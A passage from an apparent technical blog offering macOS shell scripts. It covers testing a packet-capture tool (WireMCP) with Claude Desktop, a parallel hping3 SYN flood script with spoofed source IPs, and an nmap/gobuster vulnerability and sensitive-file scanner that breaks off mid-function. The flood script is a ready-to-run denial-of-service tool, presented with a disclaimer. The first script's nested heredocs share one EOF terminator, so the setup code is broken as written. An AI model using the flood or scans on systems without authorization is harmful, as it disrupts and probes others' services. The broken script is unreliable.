chmod +x ~/setup_wiremcp_simple.sh

To test if the script worked:

cat > ~/test_wiremcp_claude.sh << 'EOF'
#!/bin/bash
# WireMCP Claude Desktop Interactive Test Script
echo "╔════════════════════════════════════════════════════════╗"
echo "║     WireMCP + Claude Desktop Testing Tool             ║"
echo "╚════════════════════════════════════════════════════════╝"
echo ""
# Colors
GREEN='\033[0;32m'
BLUE='\033[0;34m'
YELLOW='\033[1;33m'
NC='\033[0m'
# Check prerequisites
echo -e "${BLUE}[1/4]${NC} Checking prerequisites..."
if ! command -v tshark >/dev/null 2>&1; then
echo "   ✗ tshark not found"
exit 1
fi
if [[ ! -d "$HOME/WireMCP" ]]; then
echo "   ✗ WireMCP not found at ~/WireMCP"
exit 1
fi
if [[ ! -f "$HOME/Library/Application Support/Claude/claude_desktop_config.json" ]]; then
echo "   ⚠ Claude Desktop config not found"
fi
echo -e "   ${GREEN}✓${NC} All prerequisites met"
echo ""
# Detect Zscaler
echo -e "${BLUE}[2/4]${NC} Detecting network configuration..."
ZSCALER_IF=""
for iface in $(ifconfig -l | grep -o 'utun[0-9]*'); do
IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
if [[ "$IP" == 100.64.* ]]; then
ZSCALER_IF="$iface"
echo -e "   ${GREEN}✓${NC} Zscaler tunnel: $iface ($IP)"
break
fi
done
if [[ -z "$ZSCALER_IF" ]]; then
echo "   ⚠ No Zscaler tunnel detected (will use en0)"
ZSCALER_IF="en0"
fi
echo ""
# Generate test traffic
echo -e "${BLUE}[3/4]${NC} Generating test network traffic..."
# Background network requests
(curl -s https://api.github.com/zen > /dev/null 2>&1) &
(curl -s https://httpbin.org/get > /dev/null 2>&1) &
(curl -s https://www.google.com > /dev/null 2>&1) &
(ping -c 3 8.8.8.8 > /dev/null 2>&1) &
sleep 2
echo -e "   ${GREEN}✓${NC} Test traffic generated (GitHub, httpbin, Google, DNS)"
echo ""
# Show test prompts
echo -e "${BLUE}[4/4]${NC} Test prompts for Claude Desktop"
echo "════════════════════════════════════════════════════════"
echo ""
echo -e "${YELLOW}📋 Copy these prompts into Claude Desktop:${NC}"
echo ""
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 1: Basic Connection Test"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Can you see the WireMCP tools? List all available network analysis capabilities you have access to.
EOF
echo ""
echo "Expected: Claude should list 7 tools (capture_packets, get_summary_stats, etc.)"
echo ""
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 2: Simple Packet Capture"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture 20 network packets and show me a summary including:
- Source and destination IPs
- Protocols used
- Port numbers
- Any interesting patterns
EOF
echo ""
echo "Expected: Packets from $ZSCALER_IF with IPs in 100.64.x.x range"
echo ""
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 3: Protocol Analysis"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture 50 packets and show me:
1. Protocol breakdown (TCP, UDP, DNS, HTTP, TLS)
2. Which protocol is most common
3. Protocol hierarchy statistics
EOF
echo ""
echo "Expected: Protocol percentages and hierarchy tree"
echo ""
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 4: Connection Analysis"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture 100 packets and show me network conversations:
- Top 5 source/destination pairs
- Number of packets per conversation
- Bytes transferred
EOF
echo ""
echo "Expected: Conversation statistics with packet/byte counts"
echo ""
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 5: Threat Detection"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture traffic for 30 seconds and check all destination IPs against threat databases. Tell me if any malicious IPs are detected.
EOF
echo ""
echo "Expected: List of IPs and threat check results (should show 'No threats')"
echo ""
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 6: HTTPS Decryption (Advanced)"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "⚠️  First: Restart your browser after running this:"
echo "    source ~/.zshrc && echo \$SSLKEYLOGFILE"
echo ""
cat << 'EOF'
Capture 30 packets while I browse some HTTPS websites. Can you see any HTTP hostnames or request URIs from the HTTPS traffic?
EOF
echo ""
echo "Expected: If SSL keys are logged, Claude sees decrypted HTTP data"
echo ""
echo "════════════════════════════════════════════════════════"
echo ""
echo -e "${YELLOW}🔧 Manual Verification Commands:${NC}"
echo ""
echo "  # Test manual capture:"
echo "  sudo tshark -i $ZSCALER_IF -c 10"
echo ""
echo "  # Check SSL keylog:"
echo "  ls -lh ~/.wireshark-sslkeys.log"
echo ""
echo "  # Test WireMCP server:"
echo "  cd ~/WireMCP && timeout 3 node index.js"
echo ""
echo "  # Check Claude config:"
echo "  cat \"\$HOME/Library/Application Support/Claude/claude_desktop_config.json\""
echo ""
echo "════════════════════════════════════════════════════════"
echo ""
echo -e "${GREEN}✅ Test setup complete!${NC}"
echo ""
echo "Next steps:"
echo "  1. Open Claude Desktop"
echo "  2. Copy/paste the test prompts above"
echo "  3. Verify Claude can access WireMCP tools"
echo "  4. Check ~/WIREMCP_TESTING_EXAMPLES.md for more examples"
echo ""
# Keep generating traffic in background
echo "Keeping test traffic active for 2 minutes..."
echo "(You can Ctrl+C to stop)"
echo ""
# Generate continuous light traffic
for i in {1..24}; do
(curl -s https://httpbin.org/delay/1 > /dev/null 2>&1) &
sleep 5
done
echo ""
echo "Traffic generation complete!"
echo ""
EOF
chmod +x ~/test_wiremcp_claude.sh

Now that you've verified everything is working, the section below gives you a few example tests to carry out.

# Try WireMCP Right Now! 🚀
## 🎯 3-Minute Quick Start
### Step 1: Restart Claude Desktop (30 seconds)
```bash
# Kill and restart Claude
killall Claude
sleep 2
open -a Claude
```
### Step 2: Create a script to Generate Some Traffic (30 seconds)
```bash
cat > ~/network_activity_loop.sh << 'EOF'
#!/bin/bash
# Script to generate network activity for 30 seconds
# Useful for testing network capture tools
echo "Starting network activity generation for 30 seconds..."
echo "Press Ctrl+C to stop early if needed"
# Record start time
start_time=$(date +%s)
end_time=$((start_time + 30))
# Counter for requests
request_count=0
# Loop for 30 seconds
while [ "$(date +%s)" -lt "$end_time" ]; do
  # Create network activity to capture
  echo -n "Request set #$((++request_count)) at $(date +%T): "
  # GitHub API call
  curl -s https://api.github.com/users/octocat > /dev/null 2>&1 &
  # HTTPBin JSON endpoint
  curl -s https://httpbin.org/json > /dev/null 2>&1 &
  # IP address check
  curl -s https://ifconfig.me > /dev/null 2>&1 &
  # Wait for background jobs to complete
  wait
  echo "completed"
  # Small delay to avoid overwhelming the servers
  sleep 0.5
done
echo ""
echo "Network activity generation completed!"
echo "Total request sets sent: $request_count"
echo "Duration: 30 seconds"
EOF
chmod +x ~/network_activity_loop.sh
# Call the script
~/network_activity_loop.sh
```

Time to play!

Now open Claude Desktop and we can run a few tests…

1. Ask Claude:

Can you see the WireMCP tools? List all available network analysis capabilities.

Claude should list 7 tools:
- capture_packets
- get_summary_stats
- get_conversations
- check_threats
- check_ip_threats
- analyze_pcap
- extract_credentials

2. Ask Claude:

Capture 20 network packets and tell me:
– What IPs am I talking to?
– What protocols are being used?
– Anything interesting?

3. In a terminal, run:

```bash
curl -v https://api.github.com/users/octocat
```

Ask Claude:

I just called api.github.com. Can you capture my network traffic
for 10 seconds and tell me:
1. What IP did GitHub resolve to?
2. How long did the connection take?
3. Were there any errors?

4. Ask Claude:

Monitor my network for 30 seconds and show me:
– Top 5 destinations by packet count
– What services/companies am I connecting to?
– Any unexpected connections?

5. Developer Debugging Examples – Debug Slow API. Ask Claude:

I’m calling myapi.company.com and it feels slow.
Capture traffic for 30 seconds while I make a request and tell me:
– Where is the latency coming from?
– DNS, TCP handshake, TLS, or server response?
– Any retransmissions?

6. Developer Debugging Examples – Debug Connection Timeout. Ask Claude:

I’m getting timeouts to db.example.com:5432.
Capture for 30 seconds and tell me:
1. Is DNS resolving?
2. Are SYN packets being sent?
3. Do I get SYN-ACK back?
4. Any firewall blocking?

7. TLS Handshake failures (often happen with zero trust networks and cert pinning). Ask Claude:

Monitor my network for 2 minutes and look for abnormal TLS handshakes, in particular short-lived TLS handshakes, which can occur due to cert pinning issues.

8. Check for Threats. Ask Claude:

Monitor my network for 60 seconds and check all destination
IPs against threat databases. Tell me if anything suspicious.

9. Monitor Background Apps. Ask Claude:

Capture traffic for 30 seconds while I’m idle.
What apps are calling home without me knowing? Get conversation statistics only, showing the key connections and the amount of traffic through each. Flag any failed traffic or unusual traffic patterns.

10. VPN Testing. Ask Claude:

Capture packets for 60 seconds, during which time I will enable my VPN. Compare the before and after, and see if you can pinpoint exactly when my VPN was enabled.

11. Audit traffic. Ask Claude:

Monitor for 5 minutes and tell me:
– Which service used most bandwidth?
– Any large file transfers?
– Unexpected data usage?

12. Looking for specific protocols. Ask Claude:

Monitor my traffic for 30 seconds and see if you can spot any traffic using QUIC and give me statistics on it.

(then open YouTube in your browser)

13. DNS Queries. Ask Claude:

As a network troubleshooter, analyze all DNS queries for 30 seconds and provide potential causes for any errors. Show me detailed metrics on all queries, especially failed ones or unusual DNS patterns (like NXDOMAIN responses, or PTR and TXT queries).

14. Certificate Issues. Ask Claude:

Capture TLS handshakes for the next minute and show me the certificate chain. Look out for failed or short-lived TLS sessions.

What Makes This Powerful?

The traditional way used to be:

```bash
sudo tcpdump -i utun5 -w capture.pcap
# Wait…
# Stop capture
# Open Wireshark
# Apply filters
# Analyze packets manually
# Figure out what it means
```
Time: 10-30 minutes!

With WireMCP + Claude:


“Capture my network traffic and tell me
what’s happening in plain English”

Time: 30 seconds

Claude automatically:
– Captures on correct interface (utun5)
– Filters relevant packets
– Analyzes protocols
– Identifies issues
– Explains in human language
– Provides recommendations

Testing your site's SYN flood resistance using hping3 in parallel

You can build a SYN flood test with hping3 that lets you specify the number of SYN packets to send and scales horizontally across a configurable number of processes, using a Bash script and the xargs command. Distributing the workload across multiple processes improves throughput.
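The fan-out pattern the script relies on can be seen in isolation; this sketch runs four parallel workers with `xargs -P` (no hping3 or root needed):

```shell
#!/bin/bash
# seq feeds worker IDs to xargs; -P 4 runs up to 4 bash workers in parallel.
# Each worker just announces itself here; the real script substitutes hping3.
seq 1 4 | xargs -I {} -P 4 bash -c 'echo "worker {} started"'
```

Output order varies from run to run because the workers execute concurrently.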

The Script

This script uses hping3 to perform a SYN flood attack with a configurable packet count and number of parallel processes.

cat > ./syn_flood_parallel.sh << 'EOF'
#!/bin/bash
# A simple script to perform a SYN flood test using hping3,
# with configurable packet count, parallel processes, and optional source IP randomization.
# --- Configuration ---
TARGET_IP=$1
TARGET_PORT=$2
PACKET_COUNT_TOTAL=$3
PROCESSES=$4
RANDOMIZE_SOURCE=${5:-true}  # Default to true if not specified
# --- Usage Message ---
if [ -z "$TARGET_IP" ] || [ -z "$TARGET_PORT" ] || [ -z "$PACKET_COUNT_TOTAL" ] || [ -z "$PROCESSES" ]; then
echo "Usage: $0 <TARGET_IP> <TARGET_PORT> <PACKET_COUNT_TOTAL> <PROCESSES> [RANDOMIZE_SOURCE]"
echo ""
echo "Parameters:"
echo "  TARGET_IP           - Target IP address or hostname"
echo "  TARGET_PORT         - Target port number (1-65535)"
echo "  PACKET_COUNT_TOTAL  - Total number of SYN packets to send"
echo "  PROCESSES           - Number of parallel processes (2-10 recommended)"
echo "  RANDOMIZE_SOURCE    - true/false (optional, default: true)"
echo ""
echo "Examples:"
echo "  $0 192.168.1.1 80 100000 4           # With randomized source IPs (default)"
echo "  $0 192.168.1.1 80 100000 4 true      # Explicitly enable source IP randomization"
echo "  $0 192.168.1.1 80 100000 4 false     # Use actual source IP (no randomization)"
exit 1
fi
# --- Main Logic ---
echo "========================================"
echo "Starting SYN flood test on $TARGET_IP:$TARGET_PORT"
echo "Sending $PACKET_COUNT_TOTAL SYN packets with $PROCESSES parallel processes."
echo "Source IP randomization: $RANDOMIZE_SOURCE"
echo "========================================"
# Calculate packets per process
PACKETS_PER_PROCESS=$((PACKET_COUNT_TOTAL / PROCESSES))
# Build hping3 command based on randomization option
if [ "$RANDOMIZE_SOURCE" = "true" ]; then
echo "Using randomized source IPs (--rand-source)"
# Use seq and xargs to parallelize the hping3 command with random source IPs
seq 1 $PROCESSES | xargs -I {} -P $PROCESSES bash -c "hping3 -S -p $TARGET_PORT --rand-source --fast -c $PACKETS_PER_PROCESS $TARGET_IP"
else
echo "Using actual source IP (no randomization)"
# Use seq and xargs to parallelize the hping3 command without source randomization
seq 1 $PROCESSES | xargs -I {} -P $PROCESSES bash -c "hping3 -S -p $TARGET_PORT --fast -c $PACKETS_PER_PROCESS $TARGET_IP"
fi
echo ""
echo "========================================"
echo "SYN flood test complete."
echo "Total packets sent: $PACKET_COUNT_TOTAL"
echo "========================================"
EOF
chmod +x ./syn_flood_parallel.sh

Example Usage:

# Default behavior - randomized source IPs (parameter 5 defaults to true)
./syn_flood_parallel.sh 192.168.1.1 80 10000 4
# Explicitly enable source IP randomization
./syn_flood_parallel.sh 192.168.1.1 80 10000 4 true
# Disable source IP randomization (use actual source IP)
./syn_flood_parallel.sh 192.168.1.1 80 10000 4 false
# High-volume test with randomized IPs
./syn_flood_parallel.sh example.com 443 100000 8 true
# Test without IP randomization (easier to trace/debug)
./syn_flood_parallel.sh testserver.local 22 5000 2 false

Explanation of the Parameters:

Parameter 1: TARGET_IP

  • The target IP address or hostname
  • Examples: 192.168.1.1, example.com, 10.0.0.5

Parameter 2: TARGET_PORT

  • The target port number (1-65535)
  • Common: 80 (HTTP), 443 (HTTPS), 22 (SSH), 8080

Parameter 3: PACKET_COUNT_TOTAL

  • Total number of SYN packets to send
  • Range: Any positive integer (e.g., 1000 to 1000000)

Parameter 4: PROCESSES

  • Number of parallel hping3 processes to spawn
  • Recommended: 2-10 (depending on CPU cores)

Parameter 5: RANDOMIZE_SOURCE (OPTIONAL)

  • true: Use randomized source IPs (--rand-source flag)
    Makes packets appear to come from random IPs, which is harder to block
  • false: Use actual source IP (no randomization)
    Easier to trace and debug, simpler firewall rules
  • Default: true (if parameter not specified)

Important Considerations ⚠️

• Permissions: hping3 requires root privileges to craft and send raw packets, so run this script with sudo.

• Legal and Ethical Use: This tool is for ethical and educational purposes only. Using this script to perform a SYN flood attack on a network or system you do not own or have explicit permission to test is illegal. Use it in a controlled lab environment.

MacBook: Useful/Basic NMAP script to check for vulnerabilities and create a formatted report

If you want to quickly health check your website, the following simple Nmap-based script scans your site for common issues and formats the results as a readable report.

#!/bin/bash
# Nmap Vulnerability Scanner with Severity Grouping, TLS checks, and Directory Discovery
# Usage: ./vunscan.sh <target_domain>
# Colors for output
RED='\033[0;31m'
ORANGE='\033[0;33m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
GREEN='\033[0;32m'
NC='\033[0m' # No Color
# Check if target is provided
if [ $# -eq 0 ]; then
echo "Usage: $0 <target_domain>"
echo "Example: $0 example.com"
exit 1
fi
TARGET=$1
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
OUTPUT_DIR="vuln_scan_${TARGET}_${TIMESTAMP}"
RAW_OUTPUT="${OUTPUT_DIR}/raw_scan.xml"
OPEN_PORTS=""
# Debug output
echo "DEBUG: TARGET=$TARGET"
echo "DEBUG: TIMESTAMP=$TIMESTAMP"
echo "DEBUG: OUTPUT_DIR=$OUTPUT_DIR"
echo "DEBUG: RAW_OUTPUT=$RAW_OUTPUT"
# Create output directory
mkdir -p "$OUTPUT_DIR"
if [ ! -d "$OUTPUT_DIR" ]; then
echo -e "${RED}Error: Failed to create output directory $OUTPUT_DIR${NC}"
exit 1
fi
echo "================================================================"
echo "         Vulnerability Scanner for $TARGET"
echo "================================================================"
echo "Scan started at: $(date)"
echo "Results will be saved in: $OUTPUT_DIR"
echo ""
# Function to print section headers
print_header() {
echo -e "\n${BLUE}================================================================${NC}"
echo -e "${BLUE}$1${NC}"
echo -e "${BLUE}================================================================${NC}"
}
# Function to run nmap scan
run_scan() {
print_header "Running Comprehensive Vulnerability Scan"
echo "This may take several minutes…"
# First, determine which ports are open
echo "Phase 1: Port discovery..."
echo "Scanning for open ports (this may take a while)..."
# Try a faster scan first on common ports
nmap -p 1-1000,8080,8443,3306,5432,27017 --open -T4 "$TARGET" -oG "${OUTPUT_DIR}/open_ports_quick.txt" 2>/dev/null
# If user wants full scan, uncomment the next line and comment the previous one
# nmap -p- --open -T4 "$TARGET" -oG "${OUTPUT_DIR}/open_ports.txt" 2>/dev/null
# Extract open ports
if [ -f "${OUTPUT_DIR}/open_ports_quick.txt" ]; then
OPEN_PORTS=$(grep -oE '[0-9]+/open' "${OUTPUT_DIR}/open_ports_quick.txt" 2>/dev/null | cut -d'/' -f1 | tr '\n' ',' | sed 's/,$//')
fi
# If no ports found, try common web ports
if [ -z "$OPEN_PORTS" ] || [ "$OPEN_PORTS" = "" ]; then
echo -e "${YELLOW}Warning: No open ports found in quick scan. Checking common web ports...${NC}"
# Test common ports individually
COMMON_PORTS="80,443,8080,8443,22,21,25,3306,5432"
OPEN_PORTS=""
for port in $(echo $COMMON_PORTS | tr ',' ' '); do
echo -n "Testing port $port... "
if nmap -p $port --open "$TARGET" 2>/dev/null | grep -q "open"; then
echo "open"
if [ -z "$OPEN_PORTS" ]; then
OPEN_PORTS="$port"
else
OPEN_PORTS="$OPEN_PORTS,$port"
fi
else
echo "closed/filtered"
fi
done
fi
# Final fallback
if [ -z "$OPEN_PORTS" ] || [ "$OPEN_PORTS" = "" ]; then
echo -e "${YELLOW}Warning: No open ports detected. Using default web ports for scanning.${NC}"
OPEN_PORTS="80,443"
fi
echo ""
echo "Ports to scan: $OPEN_PORTS"
echo ""
# Main vulnerability scan with http-vulners-regex
echo "Phase 2: Vulnerability scanning..."
nmap -sV -sC --script vuln,http-vulners-regex \
--script-args vulns.showall,http-vulners-regex.paths={/} \
-p "$OPEN_PORTS" \
-oX "$RAW_OUTPUT" \
-oN "${OUTPUT_DIR}/scan_normal.txt" \
"$TARGET"
if [ $? -ne 0 ]; then
echo -e "${RED}Error: Nmap scan failed${NC}"
# Don't exit, continue with other scans
fi
}
# Function to parse and categorize vulnerabilities
parse_vulnerabilities() {
print_header "Parsing and Categorizing Vulnerabilities"
# Initialize arrays
declare -a critical_vulns=()
declare -a high_vulns=()
declare -a medium_vulns=()
declare -a low_vulns=()
declare -a info_vulns=()
# Create temporary files for each severity
CRITICAL_FILE="${OUTPUT_DIR}/critical.tmp"
HIGH_FILE="${OUTPUT_DIR}/high.tmp"
MEDIUM_FILE="${OUTPUT_DIR}/medium.tmp"
LOW_FILE="${OUTPUT_DIR}/low.tmp"
INFO_FILE="${OUTPUT_DIR}/info.tmp"
# Clear temp files
> "$CRITICAL_FILE"
> "$HIGH_FILE"
> "$MEDIUM_FILE"
> "$LOW_FILE"
> "$INFO_FILE"
# Parse XML output for vulnerabilities
if [ -f "$RAW_OUTPUT" ]; then
# Extract script output and categorize by common vulnerability indicators
grep -A 20 '<script id=".*vuln.*"' "$RAW_OUTPUT" | while read line; do
if echo "$line" | grep -qi "CRITICAL\|CVE.*CRITICAL\|score.*9\|score.*10"; then
echo "$line" >> "$CRITICAL_FILE"
elif echo "$line" | grep -qi "HIGH\|CVE.*HIGH\|score.*[7-8]"; then
echo "$line" >> "$HIGH_FILE"
elif echo "$line" | grep -qi "MEDIUM\|CVE.*MEDIUM\|score.*[4-6]"; then
echo "$line" >> "$MEDIUM_FILE"
elif echo "$line" | grep -qi "LOW\|CVE.*LOW\|score.*[1-3]"; then
echo "$line" >> "$LOW_FILE"
elif echo "$line" | grep -qi "INFO\|INFORMATION"; then
echo "$line" >> "$INFO_FILE"
fi
done
# Also parse normal output for vulnerability information
if [ -f "${OUTPUT_DIR}/scan_normal.txt" ]; then
# Look for common vulnerability patterns in normal output
grep -E "(CVE-|VULNERABLE|State: VULNERABLE)" "${OUTPUT_DIR}/scan_normal.txt" | while read vuln_line; do
if echo "$vuln_line" | grep -qi "critical\|9\.[0-9]\|10\.0"; then
echo "$vuln_line" >> "$CRITICAL_FILE"
elif echo "$vuln_line" | grep -qi "high\|[7-8]\.[0-9]"; then
echo "$vuln_line" >> "$HIGH_FILE"
elif echo "$vuln_line" | grep -qi "medium\|[4-6]\.[0-9]"; then
echo "$vuln_line" >> "$MEDIUM_FILE"
elif echo "$vuln_line" | grep -qi "low\|[1-3]\.[0-9]"; then
echo "$vuln_line" >> "$LOW_FILE"
else
echo "$vuln_line" >> "$INFO_FILE"
fi
done
fi
fi
}
# Function to display vulnerabilities by severity
display_results() {
print_header "VULNERABILITY SCAN RESULTS"
# Critical Vulnerabilities
echo -e "\n${RED}🔴 CRITICAL SEVERITY VULNERABILITIES${NC}"
echo "=================================================="
if [ -s "${OUTPUT_DIR}/critical.tmp" ]; then
cat "${OUTPUT_DIR}/critical.tmp" | head -20
CRITICAL_COUNT=$(wc -l < "${OUTPUT_DIR}/critical.tmp")
echo -e "${RED}Total Critical: $CRITICAL_COUNT${NC}"
else
echo -e "${GREEN}✓ No critical vulnerabilities found${NC}"
fi
# High Vulnerabilities
echo -e "\n${ORANGE}🟠 HIGH SEVERITY VULNERABILITIES${NC}"
echo "============================================="
if [ -s "${OUTPUT_DIR}/high.tmp" ]; then
cat "${OUTPUT_DIR}/high.tmp" | head -15
HIGH_COUNT=$(wc -l < "${OUTPUT_DIR}/high.tmp")
echo -e "${ORANGE}Total High: $HIGH_COUNT${NC}"
else
echo -e "${GREEN}✓ No high severity vulnerabilities found${NC}"
fi
# Medium Vulnerabilities
echo -e "\n${YELLOW}🟡 MEDIUM SEVERITY VULNERABILITIES${NC}"
echo "==============================================="
if [ -s "${OUTPUT_DIR}/medium.tmp" ]; then
cat "${OUTPUT_DIR}/medium.tmp" | head -10
MEDIUM_COUNT=$(wc -l < "${OUTPUT_DIR}/medium.tmp")
echo -e "${YELLOW}Total Medium: $MEDIUM_COUNT${NC}"
else
echo -e "${GREEN}✓ No medium severity vulnerabilities found${NC}"
fi
# Low Vulnerabilities
echo -e "\n${BLUE}🔵 LOW SEVERITY VULNERABILITIES${NC}"
echo "=========================================="
if [ -s "${OUTPUT_DIR}/low.tmp" ]; then
cat "${OUTPUT_DIR}/low.tmp" | head -8
LOW_COUNT=$(wc -l < "${OUTPUT_DIR}/low.tmp")
echo -e "${BLUE}Total Low: $LOW_COUNT${NC}"
else
echo -e "${GREEN}✓ No low severity vulnerabilities found${NC}"
fi
# Information/Other
echo -e "\n${GREEN}ℹ️  INFORMATIONAL${NC}"
echo "========================="
if [ -s "${OUTPUT_DIR}/info.tmp" ]; then
cat "${OUTPUT_DIR}/info.tmp" | head -5
INFO_COUNT=$(wc -l < "${OUTPUT_DIR}/info.tmp")
echo -e "${GREEN}Total Info: $INFO_COUNT${NC}"
else
echo "No informational items found"
fi
}
# Function to run gobuster scan for enhanced directory discovery
run_gobuster_scan() {
echo "Running gobuster directory scan..."
GOBUSTER_RESULTS="${OUTPUT_DIR}/gobuster_results.txt"
PERMISSION_ANALYSIS="${OUTPUT_DIR}/gobuster_permissions.txt"
> "$PERMISSION_ANALYSIS"
for port in $(echo "$WEB_PORTS" | tr ',' ' '); do
PROTOCOL="http"
if [[ "$port" == "443" || "$port" == "8443" ]]; then
PROTOCOL="https"
fi
echo "Scanning $PROTOCOL://$TARGET:$port with gobuster..."
# Run gobuster with common wordlist
if [ -f "/usr/share/wordlists/dirb/common.txt" ]; then
WORDLIST="/usr/share/wordlists/dirb/common.txt"
elif [ -f "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt" ]; then
WORDLIST="/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt"
else
# Create a small built-in wordlist
WORDLIST="${OUTPUT_DIR}/temp_wordlist.txt"
cat > "$WORDLIST" <<EOF
admin
administrator
api
backup
bin
cgi-bin
config
data
database
db
debug
dev
development
doc
docs
documentation
download
downloads
error
errors
export
files
hidden
images
img
include
includes
js
library
log
logs
manage
management
manager
media
old
private
proc
public
resources
scripts
secret
secure
server-status
staging
static
storage
system
temp
templates
test
testing
tmp
upload
uploads
users
var
vendor
web
webapp
wp-admin
wp-content
.git
.svn
.env
.htaccess
.htpasswd
robots.txt
sitemap.xml
web.config
phpinfo.php
info.php
test.php
EOF
fi
# Run gobuster with status code analysis
gobuster dir -u "$PROTOCOL://$TARGET:$port" \
-w "$WORDLIST" \
-k \
-t 10 \
--no-error \
-o "${GOBUSTER_RESULTS}_${port}.txt" \
-s "200,204,301,302,307,401,403,405" 2>/dev/null
# Analyze results for permission issues
if [ -f "${GOBUSTER_RESULTS}_${port}.txt" ]; then
echo "Analyzing gobuster results for permission issues..."
# Check for 403 Forbidden directories
grep "Status: 403" "${GOBUSTER_RESULTS}_${port}.txt" | while read line; do
dir=$(echo "$line" | awk '{print $1}')
echo -e "${ORANGE}[403 Forbidden]${NC} $PROTOCOL://$TARGET:$port$dir - Directory exists but access denied" >> "$PERMISSION_ANALYSIS"
echo -e "${ORANGE}  Permission Issue:${NC} $PROTOCOL://$TARGET:$port$dir (403 Forbidden)"
done
# Check for 401 Unauthorized directories
grep "Status: 401" "${GOBUSTER_RESULTS}_${port}.txt" | while read line; do
dir=$(echo "$line" | awk '{print $1}')
echo -e "${YELLOW}[401 Unauthorized]${NC} $PROTOCOL://$TARGET:$port$dir - Authentication required" >> "$PERMISSION_ANALYSIS"
echo -e "${YELLOW}  Auth Required:${NC} $PROTOCOL://$TARGET:$port$dir (401 Unauthorized)"
done
# Check for directory listing enabled (potentially dangerous)
grep "Status: 200" "${GOBUSTER_RESULTS}_${port}.txt" | while read line; do
dir=$(echo "$line" | awk '{print $1}')
# Check if it's a directory by looking for trailing slash or common directory patterns
if [[ "$dir" =~ /$ ]] || [[ ! "$dir" =~ \. ]]; then
# Test if directory listing is enabled
RESPONSE=$(curl -k -s --max-time 5 "$PROTOCOL://$TARGET:$port$dir" 2>/dev/null)
if echo "$RESPONSE" | grep -qi "index of\|directory listing\|parent directory\|<pre>\|<dir>"; then
echo -e "${RED}[Directory Listing Enabled]${NC} $PROTOCOL://$TARGET:$port$dir - SECURITY RISK" >> "$PERMISSION_ANALYSIS"
echo -e "${RED}  🚨 Directory Listing:${NC} $PROTOCOL://$TARGET:$port$dir"
fi
fi
done
# Check for sensitive files with incorrect permissions
for sensitive_file in ".git/config" ".env" ".htpasswd" "web.config" "phpinfo.php" "info.php" ".DS_Store" "Thumbs.db"; do
if grep -q "/$sensitive_file.*Status: 200" "${GOBUSTER_RESULTS}_${port}.txt"; then
echo -e "${RED}[Sensitive File Exposed]${NC} $PROTOCOL://$TARGET:$port/$sensitive_file - CRITICAL SECURITY RISK" >> "$PERMISSION_ANALYSIS"
echo -e "${RED}  🚨 Sensitive File:${NC} $PROTOCOL://$TARGET:$port/$sensitive_file"
fi
done
fi
done
# Clean up temporary wordlist if created
[ -f "${OUTPUT_DIR}/temp_wordlist.txt" ] && rm -f "${OUTPUT_DIR}/temp_wordlist.txt"
# Display permission analysis summary
if [ -s "$PERMISSION_ANALYSIS" ]; then
echo ""
echo -e "${ORANGE}=== Directory Permission Issues Summary ===${NC}"
cat "$PERMISSION_ANALYSIS"
# Count different types of issues
FORBIDDEN_COUNT=$(grep -c "403 Forbidden" "$PERMISSION_ANALYSIS" 2>/dev/null)
UNAUTH_COUNT=$(grep -c "401 Unauthorized" "$PERMISSION_ANALYSIS" 2>/dev/null)
LISTING_COUNT=$(grep -c "Directory Listing Enabled" "$PERMISSION_ANALYSIS" 2>/dev/null)
SENSITIVE_COUNT=$(grep -c "Sensitive File Exposed" "$PERMISSION_ANALYSIS" 2>/dev/null)
echo ""
echo "Permission Issue Statistics:"
echo "  - 403 Forbidden directories: $FORBIDDEN_COUNT"
echo "  - 401 Unauthorized directories: $UNAUTH_COUNT"
echo "  - Directory listings enabled: $LISTING_COUNT"
echo "  - Sensitive files exposed: $SENSITIVE_COUNT"
fi
}
# Function to run TLS/SSL checks
run_tls_checks() {
print_header "Running TLS/SSL Security Checks"
# Check for HTTPS ports
HTTPS_PORTS=$(echo "$OPEN_PORTS" | tr ',' '\n' | grep -E '443|8443' | tr '\n' ',' | sed 's/,$//')
if [ -z "$HTTPS_PORTS" ]; then
HTTPS_PORTS="443"
echo "No HTTPS ports found in scan, checking default port 443..."
fi
echo "Checking TLS/SSL on ports: $HTTPS_PORTS"
# Run SSL scan using nmap ssl scripts
nmap -sV --script ssl-cert,ssl-enum-ciphers,ssl-known-key,ssl-ccs-injection,ssl-heartbleed,ssl-poodle,sslv2,tls-alpn,tls-nextprotoneg \
-p "$HTTPS_PORTS" \
-oN "${OUTPUT_DIR}/tls_scan.txt" \
"$TARGET" 2>/dev/null
# Parse TLS results
TLS_ISSUES_FILE="${OUTPUT_DIR}/tls_issues.txt"
> "$TLS_ISSUES_FILE"
# Check for weak ciphers
if grep -q "TLSv1.0\|SSLv2\|SSLv3" "${OUTPUT_DIR}/tls_scan.txt" 2>/dev/null; then
